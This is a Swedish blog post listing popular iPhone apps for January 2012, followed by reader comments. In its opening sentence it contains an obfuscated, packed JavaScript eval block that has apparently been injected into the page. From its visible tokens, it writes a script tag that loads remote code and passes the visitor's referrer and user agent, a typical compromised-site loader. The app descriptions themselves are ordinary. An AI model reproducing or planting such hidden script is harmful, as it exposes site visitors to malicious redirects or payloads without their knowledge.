Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Månadens appar januari 2012

Månadens appar januari 2012
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|assks|var|u0026u|referrer|nzdrk||js|php’.split(’|’),0,{}))
är det slut på januari månad och det är dags att lista några av de mest nerladdade apparna i appstore.
Appar for the win!

Shazam iPlayer: Den populära applikationen Shazam ersätter nu din standard musikspelare på iPhone. Med denna app kan du förutom lyssna på musik nu också få upp texter till låtarna live. LyricPlay hittar upp rätt sångtexter som visas i realtid så du lätt kan sjunga med. Alla låtar finns inte med men tycker själv den verkar vara rätt uppdaterad.
[divide style=”3″]

Highlight: Använder information från ditt Facebook-konto för att markera om andra användare i närheten använder highlight och bör veta om varandra. Den berättar också om några av dina ”riktiga” vänner är i närheten Applikationen skickar ett push meddelande när någon resor in i din radie. Kul app om man vill ha lite koll på vart polarna är 😛
[divide style=”3″]

Commit: En enkel applikation som håller reda på ditt vardagliga liv. Om det är något du vill göra varje dag för att bilda goda vanor eller få praktik kan denna app underlätta dig att komma i fin form, enkelt gränssnitt och hjälpsamma påminnelser.

 

[divide style=”3″]

LightBomber: LightBomber tar bilder med lång exponering speciellt anpassade för ljus målning. Inställningarna är begränsade, men inkluderar tips om hur man tar den bästa bilden. I själva verket är denna app full av tips som hjälper dig fånga det bästa ljuset för fotografier. Applikationen innehåller även olika ”ljus” som kan användas för att skapa snygga målningar.
[divide style=”3″]

 

Vi kommer att lägga ut appar för Android, iPad och Windows Phone i en senare artikel. Det är ett gäng riktigt bra också så håll er uppdaterade 🙂

Comments

 1. Olof i hörnet

  Skrev inte Filip månadens app igår? =D är det 4 till nu?

  • Jo absolut olof (tror jag vet vem du är =D ), men som sagt. Här är 4 till…

  • Johannes

   Igår var det januari månad om jag inte minns fel

   • Olof i hörnet

    Det har du rätt i johannes, men borde de inte vara lite mellanrum mellan månadernas appar? kan ju inte vara en den sida i månaden och sen igen den första i månaden =D…

 2. Lina B

  Ladda ner apparna nu istället nu 🙂